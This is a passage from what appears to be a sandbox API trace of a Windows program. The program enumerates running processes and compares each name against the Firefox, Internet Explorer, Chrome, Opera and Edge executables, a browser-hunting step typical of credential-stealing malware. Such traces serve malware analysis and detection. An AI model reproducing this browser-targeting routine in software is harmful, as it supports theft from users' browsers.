(lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.028] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.028] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.028] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.028] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.028] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0193.028] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.028] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.029] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.029] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.029] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.029] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0193.029] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.029] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0193.030] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0193.030] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0193.030] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0193.030] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0193.030] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.030] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0193.030] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0193.030] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0193.030] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0193.030] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0193.030] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.030] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0193.031] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0193.031] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0193.031] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0193.031] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0193.031] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.031] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.031] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.031] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.031] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.031] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0193.031] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.031] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0193.032] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0193.032] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0193.032] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0193.032] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0193.032] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.032] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0193.032] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0193.032] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0193.033] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0193.033] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0193.033] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.033] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0193.033] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0193.033] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0193.033] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0193.033] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0193.033] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.033] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0193.034] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0193.034] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0193.034] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0193.034] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0193.034] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.034] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0193.034] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0193.034] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0193.034] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0193.034] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0193.034] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.034] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0193.035] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0193.035] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0193.035] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0193.035] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0193.035] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.035] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0193.035] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0193.035] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0193.035] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0193.035] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0193.035] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.036] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0193.036] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0193.036] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0193.036] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0193.036] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0193.036] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.036] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0193.037] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0193.037] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0193.037] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0193.037] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0193.037] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.037] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0193.037] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0193.037] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0193.037] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0193.037] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0193.037] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.037] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0193.038] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0193.038] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0193.038] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0193.038] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0193.038] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.038] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0193.038] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0193.038] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0193.038] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0193.038] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0193.038] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.038] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0193.039] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0193.039] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0193.039] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0193.039] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0193.039] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.039] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0193.039] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0193.040] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0193.040] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0193.040] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0193.040] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.040] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0193.040] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0193.040] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0193.040] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0193.040] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0193.040] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.040] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0193.041] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0193.041] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0193.041] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0193.041] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0193.041] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.041] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0193.041] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0193.041] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0193.041] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0193.041] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0193.041] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.041] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0193.042] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0193.042] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0193.042] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0193.042] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0193.042] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.042] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0193.043] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0193.043] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0193.043] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0193.043] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0193.043] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.043] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0193.051] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0193.051] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0193.051] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0193.051] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0193.051] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.052] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0193.052] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0193.052] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0193.052] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0193.052] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0193.052] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.052] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0193.053] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0193.053] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0193.053] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0193.053] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0193.053] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.053] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0193.053] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0193.053] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0193.053] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0193.053] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0193.053] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.053] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.054] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.054] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.054] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.054] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0193.054] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.054] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0193.054] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0193.054] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0193.054] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0193.054] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0193.054] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.054] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.055] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.055] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.055] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.055] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0193.055] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.055] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0193.055] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0193.056] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0193.056] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0193.056] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0193.056] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.056] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.056] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.056] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.056] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.056] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0193.056] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.056] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.057] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0193.057] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0193.057] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0193.057] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0193.057] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.057] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0193.057] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0193.057] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0193.057] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0193.057] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0193.057] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.057] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, 